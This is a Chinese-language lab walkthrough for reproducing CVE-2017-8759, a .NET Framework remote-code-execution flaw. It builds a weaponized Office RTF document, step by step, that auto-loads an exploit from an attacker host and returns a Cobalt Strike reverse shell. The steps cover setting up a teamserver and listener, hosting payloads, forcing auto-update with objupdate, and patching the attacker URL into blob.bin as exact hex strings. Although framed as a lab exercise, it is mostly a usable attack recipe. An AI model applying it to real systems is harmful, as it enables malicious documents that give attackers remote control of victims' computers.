微软.NET Framework cve-2017-8759 复现

追梦

测试环境：

目标靶机：win7x64  office2016(只能在office2010以上执行才能成功）   ip:192.168.3.117

攻击机：kali2017  ip:192.168.3.118

1.启动cobaltstrike服务端：

root@kail:~/桌面/cobaltstrike#./teamserver 192.168.3.118 123456

2.启动cobaltstrike客户端(这里我用的window下的客户端连接的)：

3.设置一个Listener（Cobal Strike = > Listener => add），添加一个HTTPS的监听器，端口为443

4.下载CVE-2017-8759，并将cmd.hta重名为cmd.jpg然后修改里面的内容(github下载地址:https://raw.githubusercontent.co ... 017-8759-master.zip)

5.这里将exploit.txt里面的IP地址改为自己的

6.设置Web Drive功能并添加cmd.jpg

Attacks=>Web Drive-by=> HOST file

7.设置Attacks=>WebDrive-by=> HOST file

8.生成木马Attacks=>WebDrive-by=> Script Web Delivery

9.点击Attacks=>Web Drive-by=> mange，查看当前设置：

10.制作trf文档，打开office，插入对象为：http://192.168.3.118:80/exploit.txt,并保存成为test.rtf

11.在test.rtf中用编辑器打开并查找找到

{\object\objautlink\rsltpict\objw4321\objh4321这一部分，替换修改为：{\object\objupdate\objautlink\rsltpict\objw4321\objh4321。其目的是让word自动更新加载poc.

12.用C32Asm静态反编译工具以16进制打开并编辑修改blob.bin

然后修改为：http://192.168.3.118:80/exploit.txt，利用小葵工具将其转化为16进制，去掉0x，最终为：

68007400740070003A002F002F003100390032002E003100360038002E0033002E003100310038003A00380030002F006500780070006C006F00690074002E00740078007400

通过查找替换16进制进行修改：

拷贝--hex格式出：

680074007400700073003A002F002F0078007800780078007800780078007800780078007800780078007800780078007800780078007800780078007800780078007800780078000000000000000000

替换为：

68007400740070003A002F002F003100390032002E003100360038002E0033002E003100310038003A00380030002F006500780070006C006F00690074002E0074007800740000000000000000000000

13.将生成好的blob.bin以16进制打开，然后全选--拷贝--hex拷贝

粘贴处所有的十六进制替换掉test.rtf里面的从：

}{\*\objdata开始到}{\result之间的所有数据，并保存文件

14.将替换好的test.rtf文件传输或者发送到目标靶机windows7主机上，并打开执行。

15.即可在cs中反弹出shell出来：